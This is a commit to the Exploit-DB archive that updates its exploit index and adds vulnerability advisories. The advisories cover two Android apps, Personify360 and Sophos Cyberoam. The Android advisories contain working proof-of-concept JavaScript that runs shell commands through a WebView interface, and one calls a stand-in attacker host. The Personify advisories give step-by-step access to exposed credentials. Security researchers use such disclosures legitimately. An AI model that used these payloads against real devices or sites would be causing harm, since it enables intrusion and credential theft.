DB: 2017-07-04
6 new exploits Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl) Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby) OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Perl) OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Ruby) Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python) OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Python) Boa WebServer 0.94.x - Terminal Escape Sequence in Logs Command Injection Boa Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection eVestigator Forensic PenTester - MITM Remote Code Execution BestSafe Browser - MITM Remote Code Execution Personify360 7.5.2/7.6.1 - Improper Access Restrictions Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions Sophos Cyberoam - Cross-site scripting BOA Web Server 0.94.14rc21 - Arbitrary File Access
This commit is contained in:
parent
da85974f2a
commit
6a2dd9562e
7 changed files with 544 additions and 4 deletions
14
files.csv
14
files.csv
|
@ -10081,12 +10081,12 @@ id,file,description,date,author,platform,type,port
|
|||
5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,windows,remote,69
|
||||
5612,platforms/windows/remote/5612.html,"idautomation bar code - ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0
|
||||
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0
|
||||
5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
|
||||
5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
|
||||
5622,platforms/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
|
||||
5632,platforms/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Ruby)",2008-05-16,L4teral,linux,remote,22
|
||||
5681,platforms/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,windows,remote,0
|
||||
5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,623
|
||||
5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,8800
|
||||
5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1 < 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
|
||||
5720,platforms/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - (Predictable PRNG) Brute Force SSH (Python)",2008-06-01,"WarCat team",linux,remote,22
|
||||
5732,platforms/windows/remote/5732.html,"C6 Messenger - ActiveX Remote Download and Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0
|
||||
5738,platforms/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,windows,remote,1100
|
||||
5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0
|
||||
|
@ -14630,7 +14630,7 @@ id,file,description,date,author,platform,type,port
|
|||
33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0
|
||||
33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0
|
||||
33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
|
||||
33504,platforms/multiple/remote/33504.txt,"Boa WebServer 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
|
||||
33504,platforms/multiple/remote/33504.txt,"Boa Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0
|
||||
33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,multiple,remote,9855
|
||||
33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Directory Traversal",2010-02-08,Markot,windows,remote,0
|
||||
33525,platforms/php/remote/33525.txt,"Zend Framework 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass",2010-01-14,"draic Brady",php,remote,0
|
||||
|
@ -15618,6 +15618,7 @@ id,file,description,date,author,platform,type,port
|
|||
42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
|
||||
42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
|
||||
41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
|
||||
42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
|
||||
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
|
||||
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
|
||||
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
|
||||
|
@ -15679,6 +15680,7 @@ id,file,description,date,author,platform,type,port
|
|||
42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
|
||||
42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
|
||||
42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
|
||||
42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -38026,6 +38028,8 @@ id,file,description,date,author,platform,type,port
|
|||
41967,platforms/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery",2017-05-05,Sysdream,php,webapps,80
|
||||
41976,platforms/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",linux,webapps,0
|
||||
41979,platforms/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",php,webapps,0
|
||||
41985,platforms/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",aspx,webapps,0
|
||||
41986,platforms/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",aspx,webapps,0
|
||||
41988,platforms/php/webapps/41988.txt,"QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass",2017-05-10,"Kacper Szurek",php,webapps,8080
|
||||
41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0
|
||||
41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0
|
||||
|
@ -38048,6 +38052,7 @@ id,file,description,date,author,platform,type,port
|
|||
42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0
|
||||
42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0
|
||||
42044,platforms/php/webapps/42044.txt,"PlaySMS 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0
|
||||
42062,platforms/hardware/webapps/42062.txt,"Sophos Cyberoam - Cross-site scripting",2017-05-25,"Bhadresh Patel",hardware,webapps,0
|
||||
42064,platforms/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42065,platforms/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42066,platforms/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
|
@ -38104,3 +38109,4 @@ id,file,description,date,author,platform,type,port
|
|||
42268,platforms/windows/webapps/42268.py,"Easy File Sharing Web Server 7.2 - Unrestricted File Upload",2017-06-28,Chako,windows,webapps,0
|
||||
42269,platforms/linux/webapps/42269.txt,"Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities",2017-06-28,"Core Security",linux,webapps,0
|
||||
42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0
|
||||
42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
103
platforms/android/remote/42287.txt
Executable file
103
platforms/android/remote/42287.txt
Executable file
|
@ -0,0 +1,103 @@
|
|||
# Exploit Title: eVestigator Forensic PenTester v1 - Remote Code Execution via MITM
|
||||
# Date: 30/Jun/17
|
||||
# Exploit Author: MaXe
|
||||
# Vendor Homepage: https://play.google.com/store/apps/details?id=penetrationtest.eVestigator.com
|
||||
# Software Link: See APK archive websites
|
||||
# Screenshot: Refer to https://www.youtube.com/watch?v=cTu7yKTp8vc
|
||||
# Version: V1
|
||||
# Tested on: Android 4.0.3 (Google APIs) - API Level 15 - x86
|
||||
# CVE : N/A
|
||||
|
||||
eVestigator Forensic PenTester - Remote Code Execution via MITM
|
||||
|
||||
Version affected: V1
|
||||
|
||||
App Info: The Android application reviewed, according to the developer, performs a "thorough forensic level Penetration Test". During run-time and reverse engineering analysis, it was discovered that the application does a connect() scan (i.e. TCP 3-way handshake) to all 65535 TCP ports, for the external IP address of the app user, with 10 simultaneous threads. However, in case a target has all 65535 TCP ports open, the application will actually report that there are 87375 "threats" (i.e. ports) open. Even after scanning all the ports, the application will continue to run forever, and for example count down from the same minute several times. (i.e. when the timer hits 14:00, it goes back up to 14:59)
|
||||
|
||||
The application does not report to the user which ports are open, and it does not provide a final report either. Nor does it even attempt to grab any service banners. If the "Send to eVestigator" button is clicked, none of the scan details are sent either. Instead, the external IP address along with other details about the Android environment + user-entered details are sent.
|
||||
|
||||
External Links:
|
||||
https://play.google.com/store/apps/details?id=penetrationtest.eVestigator.com
|
||||
https://www.amazon.com/eVestigator-Forensic-PenTester-Computer-Digital/dp/B01IF52TAU
|
||||
|
||||
|
||||
Credits: MaXe (@InterN0T)
|
||||
Special Thanks: no1special
|
||||
Shouts: SubHacker and the rest of the awesome infosec community.
|
||||
|
||||
|
||||
-:: The Advisory ::-
|
||||
The Android application is vulnerable to Remote Code Execution via Man-In-The-Middle (MITM) attacks. This is caused by the following lines of code within the \penetrationtest\eVestigator\com\main.java file: (Lines 1589-1592)
|
||||
mostCurrent._webview1.Initialize(mostCurrent.activityBA, "Webview1");
|
||||
mostCurrent._webview1.Loadproton-Url("http://api.ipify.org/?format=txt");
|
||||
WebViewExtras webViewExtras = mostCurrent._webviewextras1;
|
||||
WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "B4A");
|
||||
|
||||
In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml, Line: 3)
|
||||
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="19" />
|
||||
|
||||
If an attacker performs a MITM attack against "api.ipify.org" by e.g. hijacking the domain name, DNS, IP prefix, or by serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "api.ipify.org", then the attacker can instruct the Android application to execute attacker controlled Java code that the phone will execute in the context of the application.
|
||||
|
||||
The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be used to execute arbitrary Java code by using reflection to a ccess public methods with attacker provided JavaScript.
|
||||
|
||||
|
||||
-:: Proof of Concept ::-
|
||||
A successful MITM attack that makes "api.ipify.org" serve the following code:
|
||||
<script>
|
||||
function execute(cmd){
|
||||
return B4A.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
|
||||
}
|
||||
document.write(execute(['/system/bin/sh','-c','echo test > /data/data/penetrationtest.eVestigator.com/hax0r1tn0w']));
|
||||
</script>
|
||||
|
||||
Will make the Android application create a new file in the App directory named: hax0r1tn0w
|
||||
|
||||
Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
|
||||
|
||||
|
||||
-:: Solution ::-
|
||||
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
|
||||
WebView webView = new WebView(this);
|
||||
setContentView(webView);
|
||||
...
|
||||
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
|
||||
<manifest>
|
||||
<uses-sdk android:minSdkVersion="17" />
|
||||
...
|
||||
</manifest>
|
||||
|
||||
The URL used ("http://api.ipify.org/?format=txt") should ALSO use HTTPS (and verify the hostname and certificate properly), because an attacker performing a MITM attack can otherwise force the application into scanning any target that the attacker desires. The URL used to get the external IP address of the user, should also be hosted by the developer and not a third party.
|
||||
|
||||
|
||||
References:
|
||||
http://50.56.33.56/blog/?p=314
|
||||
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
|
||||
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
|
||||
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
|
||||
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
|
||||
|
||||
Filename: penetrationtest.eVestigator.com_2016-07-11.apk
|
||||
File size: 1062059 Bytes
|
||||
|
||||
md5: FD4ACC4133526BE8106836D69867F9C1
|
||||
sha1: C92D5184ABEFDBE12D53EBE2ADCE2CFABAB96E60
|
||||
sha256: 12219EF02C714ECC8F3247D38EFC0E7DF36A9EA9C71507D7984D2C04E31CCE0B
|
||||
|
||||
App Name: eVestigator Simon Smith Forensics - PenTester
|
||||
Package Name: penetrationtest.eVestigator.com
|
||||
Package Version: V1
|
||||
|
||||
=== EOF ===
|
||||
|
||||
Video demo:
|
||||
https://www.youtube.com/watch?v=cTu7yKTp8vc
|
||||
|
||||
Full POC Archive:
|
||||
https://mega.nz/#!MHYjVCTZ!4rZhT99mi0-uTDmc_nA9sT0-xQeK-O_InYWWvMdVBFk
|
||||
|
||||
The following is the disclosure timeline:
|
||||
25 June 2017 - Vendor is notified.
|
||||
25 June 2017 - Vendor sends several threats of prosecution to InterN0T.
|
||||
26 June 2017 - Vendor pulls apps from app store and does not intend to fix vulnerabilities.
|
||||
29 June 2017 - Vendor files privacy and trademark complaints with YouTube.
|
||||
30 June 2017 - All disclosure websites notified, including Exploit-DB.
|
134
platforms/android/remote/42288.txt
Executable file
134
platforms/android/remote/42288.txt
Executable file
|
@ -0,0 +1,134 @@
|
|||
# Exploit Title: BestSafe Browser FREE NoAds - Remote Code Execution
|
||||
# Date: 30/Jun/17
|
||||
# Exploit Author: MaXe
|
||||
# Vendor Homepage: https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com
|
||||
# Software Link: See APK archive websites
|
||||
# Screenshot: Refer to https://www.youtube.com/watch?v=VXNVzjsH0As
|
||||
# Version: v3
|
||||
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
|
||||
# CVE : N/A
|
||||
|
||||
BestSafe Browser FREE NoAds - Remote Code Execution (No MITM Required!)
|
||||
|
||||
Version affected: v3
|
||||
|
||||
App Info: The Android application reviewed, according to the developer, is "secure" and is built for a better Google experience, and is essential for those who wish to protect their right to privacy.
|
||||
|
||||
External Links:
|
||||
https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com
|
||||
http://www.appsalesandsupport.com
|
||||
|
||||
|
||||
Credits: MaXe (@InterN0T)
|
||||
Special Thanks: no1special
|
||||
Shouts: SubHacker and the rest of the awesome infosec community.
|
||||
|
||||
|
||||
-:: The Advisory ::-
|
||||
The Android application is vulnerable to Remote Code Execution attacks. This is caused by the following lines of code within the
|
||||
\a1\bestsafebrowser\com\main.java file: (Lines 380 - 387)
|
||||
public static String _activity_create(boolean z) throws Exception {
|
||||
mostCurrent._activity.RemoveAllViews();
|
||||
Common.ProgressDialogShow(mostCurrent.activityBA, "Attempting to access the Internet");
|
||||
Phone phone = new Phone();
|
||||
main a1_bestsafebrowser_com_main = mostCurrent;
|
||||
_googleurl = "http://www.comparison.net.au";
|
||||
mostCurrent._activity.LoadLayout("Start", mostCurrent.activityBA);
|
||||
ActivityWrapper activityWrapper = mostCurrent._activity;
|
||||
|
||||
and
|
||||
|
||||
Lines 634 - 641:
|
||||
public static String _tr_tick() throws Exception {
|
||||
...
|
||||
webViewExtras = mostCurrent._webviewextras1;
|
||||
WebViewExtras.clearCache((WebView) mostCurrent._webview1.getObject(), true);
|
||||
webViewExtras = mostCurrent._webviewextras1;
|
||||
WebViewExtras.addJavascriptInterface(mostCurrent.activityBA, (WebView) mostCurrent._webview1.getObject(), "MyEventName");
|
||||
WebViewWrapper webViewWrapper = mostCurrent._webview1;
|
||||
main a1_bestsafebrowser_com_main2 = mostCurrent;
|
||||
webViewWrapper.Loadproton-Url(_googleurl);
|
||||
str = "";
|
||||
|
||||
In addition to the above, the following App configuration also aids in the exploitability of this issue: (File: AndroidManifest.xml, Line: 3)
|
||||
<uses-sdk android:minSdkVersion="5" android:targetSdkVersion="14" />
|
||||
|
||||
If an attacker registers the domain "comparison.net.au" (it is currently NOT registered) and creates a DNS record for "www.comparison.net.au" then the attacker has full control over anyone who installs and runs this app. This vulnerability can be used to execute arbitrary Java code in the context of the application. The ".net.au" TLD requires slightly more validation during registration, in terms of a valid ABN, ACN or Trademark number. However, as this type of validation is fully automated and this type of information is public, an attacker can easily obtain another entity's ABN, ACN or Trademark number and use that to register a domain.
|
||||
|
||||
In addition to the above, in case someone has registered "comparison.net.au", then if an attacker performs a MITM attack against "www.comparison.net.au" by e.g. hijacking the domain name, DNS, IP prefix, or by serving a malicious wireless access point (or hijacking a legitimate one), or by hacking the server at "www.comparison.net.au", then the attacker can also abuse this vulnerability.
|
||||
|
||||
The root cause of this vulnerability is caused by addJavascriptInterface() within the WebViewer, which in older API versions can be used to execute arbitrary Java code by using reflection to access public methods with attacker provided JavaScript.
|
||||
|
||||
|
||||
-:: Proof of Concept ::-
|
||||
A successful attack that makes "www.comparison.net.au" serve the following code:
|
||||
<script>
|
||||
function execute(cmd){
|
||||
return MyEventName.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmd);
|
||||
}
|
||||
execute(['/system/bin/sh', '-c', 'echo InterN0T was here > /data/data/a1.bestsafebrowser.com/owned']);
|
||||
execute(['/system/bin/sh', '-c', 'am start -a android.intent.action.VIEW -d "http://attacker-domain.tld/video.mp4"']);
|
||||
</script>
|
||||
This application has been owned.
|
||||
|
||||
Will make the Android application create a new file in the App directory named: owned, and also play a video chosen by the attacker as an example.
|
||||
|
||||
Instead of creating a new file, the attacker can also use the "drozer" payload for example. Refer to the references further below.
|
||||
|
||||
|
||||
-:: Solution ::-
|
||||
The Android app code should not use the addJavaScriptInterface() function. Instead the following code should be used:
|
||||
WebView webView = new WebView(this);
|
||||
setContentView(webView);
|
||||
...
|
||||
Alternatively, the application manifest should specify API levels JELLY_BEAN_MR1 and above as follows:
|
||||
<manifest>
|
||||
<uses-sdk android:minSdkVersion="17" />
|
||||
...
|
||||
</manifest>
|
||||
|
||||
The URL used ("http://www.comparison.net.au") should ALSO use HTTPS (and verify the hostname and certificate properly).
|
||||
|
||||
Last but not least, the following code can also be used to determine whether the addJavascriptInterface should be enabled or not:
|
||||
private void exposeJsInterface() {
|
||||
if (VERSION.SDK_INT < 17) {
|
||||
Log.i(TAG, "addJavascriptInterface() bridge disabled.");
|
||||
} else {
|
||||
addJavascriptInterface(Object, "EVENT_NAME_HERE");
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
References:
|
||||
http://50.56.33.56/blog/?p=314
|
||||
https://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface(java.lang.Object, java.lang.String)
|
||||
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
|
||||
https://labs.mwrinfosecurity.com/advisories/webview-addjavascriptinterface-remote-code-execution/
|
||||
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614
|
||||
|
||||
Filename: BestSafe Browser FREE NoAds_vv3.apk
|
||||
File size: 10,593,599 Bytes
|
||||
|
||||
md5: db5cef1b11df38ba7a560d147e6be3e6
|
||||
sha1: dd08b1c8af4e8fb4b62c32aed3cb3544042774d6
|
||||
sha256: bcf7d43f060d7e50d02a1f38abf6308961c7fd0aa0bac718e01c2ead28d7ea1d
|
||||
|
||||
App Name: BestSafe Browser FREE NoAds
|
||||
Package Name: a1.bestsafebrowser.com
|
||||
Package Version: v3
|
||||
|
||||
:)
|
||||
|
||||
=== EOF ===
|
||||
|
||||
Video demo:
|
||||
https://www.youtube.com/watch?v=VXNVzjsH0As
|
||||
|
||||
FULL POC Archive:
|
||||
https://mega.nz/#!saRkTCxD!p42DYndcH95iFViaLCmtUvt9Xwbtm1x9MiND--Xng38
|
||||
|
||||
The following is the timeline:
|
||||
29 June 2017 - Vendor is notified.
|
||||
29 June 2017 - Vendor pulls apps from app store and files privacy and trademark complaints with YouTube. Vendor does not intend to fix vulnerabilities.
|
||||
30 June 2017 - All disclosure websites notified, including Exploit-DB.
|
30
platforms/aspx/webapps/41985.txt
Executable file
30
platforms/aspx/webapps/41985.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: Access and read and create vendor / API credentials in plaintext
|
||||
# Date: 3/29/2017
|
||||
# Exploit Author: Pesach Zirkind
|
||||
# Vendor Homepage: https://personifycorp.com/
|
||||
# Version: 7.5.2 - 7.6.1
|
||||
# Tested on: Windows (all versions)
|
||||
# CVE : CVE-2017-7312
|
||||
|
||||
# Category: webapps
|
||||
|
||||
1. Description
|
||||
|
||||
Any website visitor can access a page that allows viewing and creating any vendor accounts and their credentials including all applications that use Personify API's
|
||||
|
||||
It will show username, password and block(api password)
|
||||
|
||||
New accounts can be created, or, existing accounts can be used to spoof the origin of attacker.
|
||||
|
||||
Additionally, roles can be modified for existing vendors
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
Visit: http://site.com/Default.aspx?tabId=275
|
||||
Click: Vendor Management on the left side
|
||||
Click on the vendor you wish to edit
|
||||
|
||||
3. Solution:
|
||||
|
||||
The fix is available at Personify’s SFTP site (sftp.personifycorp.com) as Personify Patch – SSO-IMS-DNN-Permission.zip
|
||||
|
27
platforms/aspx/webapps/41986.txt
Executable file
27
platforms/aspx/webapps/41986.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: Discover all tables and columns in database when creating new customer role
|
||||
# Date: 3/29/2017
|
||||
# Exploit Author: Pesach Zirkind
|
||||
# Vendor Homepage: https://personifycorp.com/
|
||||
# Version: 7.5.2 - 7.6.1
|
||||
# Tested on: Windows (all versions)
|
||||
# CVE : CVE-2017-7314
|
||||
|
||||
# Category: webapps
|
||||
|
||||
1. Description
|
||||
|
||||
Any website visitor can access a page that allows creation of a new customer role, while creating the role there is access to the database schema showing all the tables and their columns
|
||||
|
||||
It does not show the data in the database only the schema
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
Visit: http://site.com/Default.aspx?tabId=275
|
||||
Click: Role Configuration on the left side
|
||||
Click New
|
||||
Select the "Role Based on Table" dropdown
|
||||
|
||||
3. Solution:
|
||||
|
||||
The fix is available at Personify’s SFTP site (sftp.personifycorp.com) as Personify Patch – SSO-IMS-DNN-Permission.zip
|
||||
|
214
platforms/hardware/webapps/42062.txt
Executable file
214
platforms/hardware/webapps/42062.txt
Executable file
|
@ -0,0 +1,214 @@
|
|||
# Exploit Title: Sophos Cyberoam – Cross-site scripting (XSS) vulnerability
|
||||
# Date: 25/05/2017
|
||||
# Exploit Author: Bhadresh Patel
|
||||
# Version: <= Firmware Version 10.6.4
|
||||
# CVE : CVE-2016-9834
|
||||
|
||||
This is an article with video tutorial for Sophos Cyberoam –
|
||||
Cross-site scripting (XSS) vulnerability
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
Title:
|
||||
====
|
||||
|
||||
Sophos Cyberoam – Cross-site scripting (XSS) vulnerability
|
||||
|
||||
Credit:
|
||||
======
|
||||
|
||||
Name: Bhadresh Patel
|
||||
|
||||
|
||||
Date:
|
||||
====
|
||||
|
||||
25/05/2017 (dd/mm/yyyy)
|
||||
|
||||
Vendor:
|
||||
======
|
||||
|
||||
|
||||
More than 100 million users in 150 countries rely on Sophos to offer
|
||||
end-to-end protection against complex threats and data loss. Sophos is
|
||||
committed to providing complete, enterprise-grade security solutions that
|
||||
are simple to deploy, manage and use, and deliver one of the industry's
|
||||
lowest total cost of ownership. Sophos offers award-winning security
|
||||
solutions covering endpoint, mobile, server, encryption, web, email, Wi-Fi,
|
||||
and UTM/next-generation firewall, all backed by SophosLabs -- a global
|
||||
threat analysis center which provides real-time cloud-enabled security
|
||||
intelligence. Sophos is headquartered in Oxford, UK.
|
||||
|
||||
|
||||
Vulnerable Product:
|
||||
==============
|
||||
|
||||
|
||||
Sophos Cyberoam Firewall
|
||||
|
||||
|
||||
Cyberoam Next-Generation Firewalls are based on CyberoamOS – an intelligent
|
||||
and powerful firmware that offers next-generation security features include
|
||||
inline application inspection and control, website filtering, HTTPS
|
||||
inspection, Intrusion Prevention System, VPN (IPSec and SSL) and
|
||||
QoS/bandwidth management. Additional security features like Web Application
|
||||
Firewall, Gateway Anti-Virus, Gateway Anti-Spam are also available.
|
||||
|
||||
|
||||
Customer Product link: https://www.cyberoam.com
|
||||
|
||||
|
||||
|
||||
Abstract:
|
||||
=======
|
||||
|
||||
Cross-site scripting (XSS) vulnerability in Sophos Cyberoam firewall
|
||||
enables and attackers to execute scripts in a victim’s browser to hijack
|
||||
user sessions, deface web sites, insert hostile content, redirect users,
|
||||
hijack the user’s browser using malware, etc.
|
||||
|
||||
|
||||
|
||||
|
||||
Affected Software Version:
|
||||
=============
|
||||
|
||||
|
||||
<= Firmware Version 10.6.4
|
||||
|
||||
|
||||
Vendor Response
|
||||
|
||||
=============
|
||||
|
||||
|
||||
Sophos is committed to working with the security community in identifying,
|
||||
remediating and communicating security issues in our products. Customers
|
||||
are advised to upgrade their Cyberoam OS to v.10.6.5, which addresses this
|
||||
issue.
|
||||
|
||||
|
||||
Exploitation-Technique:
|
||||
===================
|
||||
|
||||
Remote
|
||||
|
||||
|
||||
Severity Rating (CVSS):
|
||||
===================
|
||||
|
||||
6.9 (Medium) (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N)
|
||||
|
||||
|
||||
|
||||
CVE ID:
|
||||
|
||||
=======
|
||||
|
||||
|
||||
CVE-2016-9834
|
||||
|
||||
|
||||
Details:
|
||||
|
||||
=======
|
||||
|
||||
This vulnerability allows remote attackers to execute arbitrary client side
|
||||
script in the active user’s browser session, when logged into the Cyberoam
|
||||
firewall. User interaction is required to exploit this vulnerability in
|
||||
that the target must visit a malicious page or open a malicious file.
